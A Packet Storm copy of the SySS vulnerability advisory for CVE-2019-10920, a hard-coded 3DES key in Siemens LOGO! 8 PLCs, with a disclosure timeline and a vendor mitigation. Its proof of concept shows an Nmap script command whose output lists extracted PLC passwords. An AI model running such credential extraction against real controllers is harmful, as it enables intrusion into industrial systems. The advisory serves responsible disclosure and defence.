what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Siemens LOGO! 8 Hard-Coded Cryptographic Key

Siemens LOGO! 8 Hard-Coded Cryptographic Key
Posted May 29, 2019
Authored by Matthias Deeg, Manuel Stotz | Site syss.de

Due to the use of a hard-coded cryptographic key, an attacker can put the integrity and confidentiality of encrypted data of all Siemens LOGO! 8 PLCs using this key at risk, for instance decrypting network communication during a man-in-the-middle attack.

tags | exploit
advisories | CVE-2019-10920
SHA-256 | fd53041141c43f3ef168910c3f5306ea1625eb1f860ca0581cc979bff7758f8c

Siemens LOGO! 8 Hard-Coded Cryptographic Key

Change Mirror Download
Hash: SHA512

Advisory ID: SYSS-2019-012
Product: LOGO!
Manufacturer: Siemens
Affected Version(s): LOGO! 8 (all versions)
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-04-04
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)
Public Disclosure: 2019-05-29
CVE Reference: CVE-2019-10920
Authors of Advisory: Manuel Stotz, Matthias Deeg (SySS GmbH)



Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.

The manufacturer describes the product as follows (see [1]):

"Simple installation, minimum wiring, user-friendly programming: You can
easily implement small automation projects with LOGO!, the intelligent
logic module from Siemens. The LOGO! Logic Module saves space in the
control cabinet, and lets you easily implement functions, such as
time-delay switches, time relays, counters and auxiliary relays. "

Due to the use of a hard-coded cryptographic key, an attacker can put
the integrity and confidentiality of encrypted data of all LOGO! 8 PLCs
using this key at risk, for instance decrypting network communication
during a man-in-the-middle attack.


Vulnerability Details:

SySS GmbH found out that LOGO! PLCs use a static, hard-coded
cryptographic 3DES key for protecting sensitive information, like
network communication and configuration data.

For instance, this key can be found within the LOGO! Soft Comfort

By knowing this static cryptographic 3DES key, an attacker can decrypt
all LOGO! data that is encrypted with this key and gain access to
sensitive data, for instance different configured passwords.


Proof of Concept (PoC):

SySS GmbH used the hard-coded cryptographic 3DES key in a software tool
(Nmap script) for extracting sensitive data such as configured passwords
as cleartext.

The following Nmap output exemplarily shows extracting password data
from a LOGO! 8 PLC:

$ nmap -p 10005 --script slig.nse
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 09:35 CEST
Nmap scan report for
Host is up (0.00044s latency).

10005/tcp open stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: LSCUser
| Password: S3cret1
| Enabled: True
| User: AppUser
| Password: S3cret2
| Enabled: True
| User: WebUser
| Password: S3cret3
| Enabled: True
| User: TDUser
| Password: S3cret4
| Enabled: True
| Protection: Password
| Program password: SECRET
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [5].



In the publicly released Siemens Security Advisory SSA-542701 [3],
the manufacturer Siemens recommends to apply a defense-in-depth concept,
including protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.


Disclosure Timeline:

2019-04-04: Vulnerability reported to manufacturer
2019-04-04: Manufacturer confirms receipt of security advisory and
asks for referenced Nmap script
2019-04-04: SySS provides PoC Nmap script
2019-05-14: Public release of Siemens Security Advisory SSA-542701
2019-05-29: Public release of SySS security advisory



[1] Product website for Siemens LOGO!
[2] SySS Security Advisory SYSS-2019-012
[3] Siemens Security Advisory SSA-542701
[4] SySS Responsible Disclosure Policy
[5] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"



This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By